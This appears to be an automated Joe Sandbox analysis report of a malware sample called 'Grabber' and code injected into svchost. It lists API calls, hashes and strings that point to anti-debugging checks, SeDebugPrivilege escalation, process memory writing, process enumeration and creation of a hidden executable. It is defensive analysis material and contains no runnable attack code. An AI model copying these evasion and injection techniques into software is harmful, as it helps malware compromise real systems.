                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 830345296-0
                                                                                                                                                                                                                          • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                                                                                                                                                                                                          • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040E145
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(02190000,00000000,0000000A), ref: 0040E169
                                                                                                                                                                                                                          • HeapReAlloc.KERNEL32(02190000,00000000,00000000,0000000A), ref: 0040E18D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(02190000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Alloc$Freewcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2479713791-0
                                                                                                                                                                                                                          • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                                                                                                                                                                                                          • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                                                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                                                                                                                                                                                                            • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 830345296-0
                                                                                                                                                                                                                          • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                                                                                                                                                                                                          • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1298188129-0
                                                                                                                                                                                                                          • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                                                                                                                                                                                                          • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                                                                                                                                                                                                                            • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                                                                                                                                                                                                            • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                                                                                                                                                                                                            • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4254243056-0
                                                                                                                                                                                                                          • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                                                                                                                                                                                                          • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:38.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:481
                                                                                                                                                                                                                          Total number of Limit Nodes:9

Callgraph
[Graph not reproduced. Legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available]

Control-flow Graph
[Graph not reproduced. Legend: Executed, Not Executed]
Memory Dump Source
• Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
• Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
Similarity
• API ID: ExitProcess$DebuggerPresent
• String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh

Control-flow Graph

Similarity
• API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
• String ID: SeDebugPrivilege

Control-flow Graph

Similarity
• API ID: Token$InformationProcess$CloseCurrentHandleOpen
• String ID:

Control-flow Graph

Similarity
• API ID: Virtual$AllocMemoryProcessProtectWrite
• String ID: @

Control-flow Graph

Similarity
• API ID: FileHeap$AllocateCloseCreateHandleProcessSize
• String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: b869d4c742584af1cf125b9547f8ae6701698a2acdf4f693115a0e6ca67554e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2812172A08B8582EB50DB55F89436AF7A5FBC9B90F504136EA8D87B68DF3CD044CB11

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                          • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction ID: 39e499edb2183f20f55127a5609ddfabdb163c6d6e592bf69cfb54d3bbb0af6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC11516162898A81DFA4AF25FC6436AA365FBC8F80F845033DA4E87A28DE3CD104C711

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: e8a55d8741fd77ba7457c4708f840c4cebe50378b922e222d86fb7c7cd482f0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 561137B190C68981EBB4AB10E89836AB365FB98B54F404736C69D82698DF3DD504CB51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: a4f14c1172be88d4579fd17a668df9162e9b1aba96832658460c891d6d0af302
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97311A6661C5C5C6DB70DB64E8983AAB3A4FB98B00F904136E68DC3A58DB3DD548CB11

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: 4fdced95383a57ac55d12e27afe95ec88d3bf100efd3725822349d713ae0b837
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0546190C24681EFB067556C24379A794BF59F04F844176D58D85594CF3CED05DB32

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                                                          • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction ID: 38de4d05bd51f37cfddc8f89d8b6af7f5991f24882226d5ab15533cf611d4343
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F0EC74C0C649D2DBA47B20E85537DA368FB59B00FA40232D54EC2650CF3CD0058631

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B
                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 00007FF7E52B3376
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$CreateProcess$CloseFileHandleOpenToken$AdjustAttributesCurrentDirectoryFolderLookupPathPrivilegePrivilegesThreadValue
                                                                                                                                                                                                                          • String ID: .x64
                                                                                                                                                                                                                          • API String ID: 3156018730-2481150777
                                                                                                                                                                                                                          • Opcode ID: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                                                                          • Instruction ID: 5caf0dfe925e994e27af1fdcf07abfc97f68b44c98acf041ba3a3a07d89b7c0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C701DBA1E1854A81EE94FB14FC653B5A679AF98B04FC58533D40DC2196CE3CE145C763

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 418 7ff7e52b1050-7ff7e52b108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
